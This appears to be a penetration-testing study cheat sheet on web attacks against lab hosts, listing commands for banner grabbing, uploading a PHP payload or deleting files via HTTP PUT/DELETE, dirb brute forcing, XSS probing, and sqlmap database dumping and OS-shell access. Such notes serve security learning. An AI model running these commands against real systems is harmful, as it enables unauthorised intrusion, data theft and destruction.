Web Attacks

Web application vulns and exploits

Netcat (for HTTP services)

nc -v 10.10.10.10 port
HEAD / HTTP/1.0

OpenSSL (for HTTPS services)

openssl s_client -connect 10.10.10.10:443
HEAD / HTTP/1.0

Httprint

httprint -P0 -h 10.10.10.10 -s /usr/share/httprint/signatures.txt

HTTP Verbs

GET, POST, HEAD, PUT, DELETE

PUT is used to upload a file to the server

You have to find the size of the file you are uploading first

wc -m payload.php
[size] payload.php
nc 10.10.10.10 80
PUT /payload.php
Content-type: text/html
Content-length: [size]

DELETE is used to delete a file from the server

nc 10.10.10.10 80
DELETE /path/to/file.txt / HTTP/1.0

OPTIONS is used to query the webserver for enabled HTTP Verbs

nc 10.10.10.10 80
OPTIONS / HTTP/1.0

Directory and File scanning

Dirbuster

dirb

dirb http://10.10.10.10/

If Webpage is authenticated

dirb http://10.10.10.10/ -u <username>:<password>

  1. You can choose different wordlists for the dictionary brute force but from my experience in most labs you can find them in the common.txt

  2. You can also choose different extensions but php and bak will be the most useful ones to find.

  3. If there is HTTP authentication or login of some other kind for the webpage you can set the creds using [Options -> Advanced Options -> Authentication options]

  4. The con with Dirbuster is that it sometimes freezes which is a real bummer otherwise it's real good.

Google Dorks

site: intitle: inurl: filetype: AND, OR & | -

GHDB for more resources.

XSS (Cross-Site Scripting)

  1. Find a reflection point

  2. Test with HTML tag (<h1>Test</h1>)

  3. Test with JS code [alert('XSS')]

XSS filter bypass cheatsheet: OWASP cheatsheet

Reflected XSS: Payload is carried inside the request the victim sends to the website. Typically the link contains the malicious payload.

Persistent XSS: Payload remains in the site that multiple users can fall victim to. Typically embedded via a form or forum post.

SQL Injections

GET

sqlmap -u 'http://10.10.10.10/search.php?id=123' -p id
sqlmap -u 'http://10.10.10.10/search.php?id=123' -p id --technique=U

Database USER

sqlmap -u 'http://10.10.10.10/search.php?id=123' -p id --technique=U --user

Databases

sqlmap -u 'http://10.10.10.10/search.php?id=123' -p id --technique=U --dbs

Dump all

sqlmap -u 'http://10.10.10.10/search.php?id=123' -p id --technique=U --dump

POST

Find the parameters that are being passed in POST using BurpSuite. E.g: username=some&password=thing where the parameter username is vulnerable.

sqlmap -u 'http://10.10.10.10/login.php' --data='username=some&password=thing' -p username --technique=B

The Databases, Users and dump-all switches are the same as for the GET parameter.

If you aren't able to deduce which parameter is vulnerable in POST, you can drop the -p switch. SQLMAP will try to test them and find them on its own so don't sweat it and also for most of the prompts use the default options(i.e. just press enter).

The --technique switch is to create less noise and prevent the service from shutting down due to query overload. If the given techniques do not work try it removing the switch.

OS-Shell

sqlmap -u "http://10.10.10.10/login.php" --os-shell

SQL-Shell

sqlmap -u "http://10.10.10.10/login.php" --sql-shell
PreviousEnumerationNextSystem Attacks

Last updated